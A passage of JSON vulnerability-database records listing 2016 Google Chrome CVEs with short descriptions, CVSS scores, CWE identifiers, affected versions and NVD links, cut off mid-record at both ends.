3.6}, "published": "2016-12-18T03:59:00", "type": "cve", "title": "CVE-2016-5189", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5189"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:53.0.2785.143"], "id": "CVE-2016-5189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5189", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:53.0.2785.143:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:14", "description": "A use after free in V8 in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5213", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5213"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5213", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:32", "description": "Type confusion in libGLESv2 in ANGLE in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android possibly allowed a remote attacker to bypass buffer validation via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5221", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5221"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5221", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5221", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:13", "description": "Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android insufficiently sanitized DevTools URLs, which allowed a remote attacker to read local files via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5212", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5212"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5212", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5212", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:18", "description": "Google Chrome prior to 55.0.2883.75 for Windows mishandled downloaded files, which allowed a remote attacker to prevent the downloaded file from receiving the Mark of the Web via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5214", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5214"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5214", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:23:18", "description": "Blink in Google Chrome prior to 54.0.2840.59 for Windows, Mac, and Linux; 54.0.2840.85 for Android had insufficient validation in bitmap handling, which allowed a remote attacker to potentially exploit heap corruption via crafted HTML pages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-12-18T03:59:00", "type": "cve", "title": "CVE-2016-5182", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5182"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:53.0.2785.143"], "id": "CVE-2016-5182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5182", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:53.0.2785.143:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:01", "description": "Leaking of an SVG shadow tree leading to corruption of the DOM tree in Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5204", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5204"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5204", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5204", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:23:51", "description": "A leak of privateClass in the extensions API in Google Chrome prior to 54.0.2840.100 for Linux, and 54.0.2840.99 for Windows, and 54.0.2840.98 for Mac allowed a remote attacker to access privileged JavaScript code via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5201", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5201"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.87"], "id": "CVE-2016-5201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5201", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.87:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:03", "description": "In Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android, corruption of the DOM tree could occur during the removal of a full screen element, which allowed a remote attacker to achieve arbitrary code execution via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5207", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5207"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5207", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5207", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:02", "description": "The PDF plugin in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly followed redirects, which allowed a remote attacker to bypass the Same Origin Policy via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5206", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5206"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5206", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:23:59", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Linux, Windows and Mac, incorrectly handles deferred page loads, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5205", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5205"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5205", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5205", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:24", "description": "A heap use after free in V8 in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5219", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5219"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5219", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5219", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:42", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly handled form actions, which allowed a remote attacker to bypass Content Security Policy via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5225", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5225"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5225", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:23:57", "description": "A use after free in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5203", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5203", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:23:17", "description": "A heap use after free in PDFium in Google Chrome prior to 54.0.2840.59 for Windows, Mac, and Linux; 54.0.2840.85 for Android allows a remote attacker to potentially exploit heap corruption via crafted PDF files.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-12-18T03:59:00", "type": "cve", "title": "CVE-2016-5183", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5183"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:53.0.2785.143"], "id": "CVE-2016-5183", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5183", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:53.0.2785.143:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:09", "description": "A use after free in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5211", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5211"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5211", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:24:05", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Linux and Windows, and 55.0.2883.84 for Android allowed possible corruption of the DOM tree during synchronous event handling, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-01-19T05:59:00", "type": "cve", "title": "CVE-2016-5208", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5208"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:google:chrome:54.0.2840.99"], "id": "CVE-2016-5208", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5208", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:54.0.2840.99:*:*:*:*:*:*:*"]}], "redhatcve": [{"lastseen": "2021-09-02T22:52:12", "description": "A missing check for whether a property of a JS object is private in V8 in Google Chrome prior to 